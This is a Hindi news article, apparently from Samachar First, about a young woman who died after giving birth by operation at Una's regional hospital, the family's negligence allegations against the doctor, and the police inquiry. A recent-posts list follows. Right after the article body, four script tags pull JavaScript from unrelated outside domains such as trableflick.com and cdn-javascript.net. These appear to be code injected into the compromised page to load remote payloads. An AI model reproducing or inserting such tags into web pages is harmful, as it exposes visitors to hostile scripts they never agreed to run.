ऊनाः प्रसव के बाद महिला ने तोड़ा दम, गुस्साए परिजनों ने अस्पताल में किया हंगामा

<p>जिला ऊना में गर्भवती महिला की मौत होने का मामला सामने आया है। यहां शनिवार को क्षेत्रीय अस्पताल ऊना में गर्भवती की ऑपरेशन के बाद मौत हो गई। महिला की पहचान 22 साल की सुनीता देवी पत्नी रवि कुमार निवासी गांव बंगाणा ऊना के रूप में हुई है। परिजनों को उसकी मौत का पता तब चला जब महिला को चेक करने आई नर्स ने उसे मृत घोषित कर दिया। बताया जा रहा है कि गर्भवती को करीब पांच दिन पहले इलाज के लिए ऊना अस्पताल में भर्ती करवाया गया था। शनिवार को ऑपरेशन के दौरान महिला ने बेटी को जन्म दिया, जिसके बाद गर्भवती की अस्पताल में मौत हो गई। गर्भवती की मौत से गुस्साए परिजनों ने अस्पताल में जमकर हंगामा किया।</p>

<p>परिजनों ने डॉक्टर पर लापरवाही का आरोप लगाया है। सुनीता के पति रवि कुमार का आरोप है कि दोपहर कोऑपरेशन के बाद पीड़िता को होश नहीं आया। परिजनों ने बताया कि उन्होंने डॉक्टर को पीड़िता को चेक करने के लिए कहा, लेकिन डॉक्टर ने एक बार भी चेक नहीं किया। इसके बाद वार्ड में आई नर्स ने सुनीता को मृत घोषित कर दिया।</p>

<p>महिला की मौत के बाद परिजन काफई भड़क गए और उन्होंने अस्पताल से शव लेने से इंकार कर दिया। सुनीता के पति का कहना है कि जब तक आरोपी डॉक्टर की गिरफ्तारी नहीं हो जाती, तब तक वे अस्पताल से शव को नहीं ले जाएंगे। डीएसपी अशोक वर्मा का कहना है कि पुलिस ने मौके पर पहुंचकर छानबीन शुरू कर दी है। फिलहाल मृतका का पोस्टमार्टम कराया जाएगा। अगर डॉक्टर की लापरवाही सामने आती है तो यकीनन उसके खिलाफ कार्रवाई की जाएगी।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1579407699523″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Sirmour News : तेज रफ्तार गाड़ी की टक्कर से 26 वर्षीय युवती की मौत

Tragic Road Accident in Sirmour; सिरमौर जिले के पांवटा साहिब की तहसील में आंज भोज…

4 mins ago

Baba Siddique murder: बाबा सिद्दीकी सुपुर्द-ए-खाक, लॉरेंस गैंग की सलमान खान को भी नहीं छोड़ेंगे की धमकी

Mumbai: अजित पवार गुट के NCP नेता और पूर्व विधायक बाबा सिद्दीकी की शनिवार रात…

16 mins ago

Himachal: रथयात्रा के साथ कुल्लू दशहरा उत्सव की भव्य शुरुआत

Kullu Dussehra Begins: राज्यपाल शिव प्रताप शुक्ल ने रविवार को कुल्लू के रथ मैदान में…

46 mins ago

Himachal: भगवान रघुनाथ की भव्य शोभायात्रा के साथ आज शुरू होगा दशहरा

International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…

9 hours ago

Himachal: सरकारी स्कूलों में शिक्षा का तरीका बदल रहा, बच्चे अंग्रेजी में पढ़ रहे

विपल्‍व सकलानी English medium education in Himachal; हिमाचल प्रदेश के सरकारी स्कूलों में पढ़ाई का…

9 hours ago

केविन पीटरसन जल्द ही परिवार संग भारत यात्रा पर, हिंदी पोस्ट ने जीता दिल

Kevin Pietersen India visit; इंग्लैंड के पूर्व स्टार बल्लेबाज केविन पीटरसन ने भारतीय क्रिकेट प्रेमियों…

9 hours ago